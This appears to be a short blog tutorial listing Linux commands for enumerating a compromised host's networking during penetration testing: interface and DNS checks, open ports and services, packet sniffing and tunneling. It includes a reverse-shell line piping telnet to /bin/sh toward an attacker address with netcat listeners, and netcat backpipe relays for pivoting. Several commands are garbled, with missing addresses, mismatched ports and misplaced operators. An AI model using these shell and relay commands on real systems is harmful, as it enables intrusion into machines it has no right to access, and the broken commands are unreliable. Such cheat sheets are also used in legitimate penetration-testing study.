Linux Communication and Networking Enumeration

Linux Communication and Networking Enumeration


Linux Communication and Networking Enumeration is an article to continue my last simple tutorial about Linux Operating System Enumeration (see here).

About the usefulness of this tutorial as I state in my last tutorial is “more enumeration you do, more data and information you can collect”.

To check how many Network Interface Card (NIC) the system have and check whether the Linux system connected to other network:

/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

To find information about the network configuration settings, such DHCP server, DNS server and also gateway:

cat /etc/resolv.conf
 cat /etc/sysconfig/network
 cat /etc/networks
 iptables -L

Linux Communication and Networking Enumeration

Checking how the other users and hosts communicating with the system:

lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
chkconfig --list | grep 3:on

Checking possibility to do packet sniffing, listen to live traffic:

# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 80 and tcp dst

Checking whether get a shell or not, and check whether we can interact with the system or not:

nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Ouput (Results)
telnet [atackers ip] 44444 | /bin/sh | [local ip] 44445

Check possibility to do packet forwarding:

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080: root@    # Local Port
ssh -R 8080: root@    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0 & < backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Check possibility to do tunneling and send command locally or remotely:

ssh -D -N [username]@[ip]
proxychains ifconfig

What’s cached? and finding the IP and/or MAC address:

arp -e
/sbin/route -nee

Hope you found it useful 🙂

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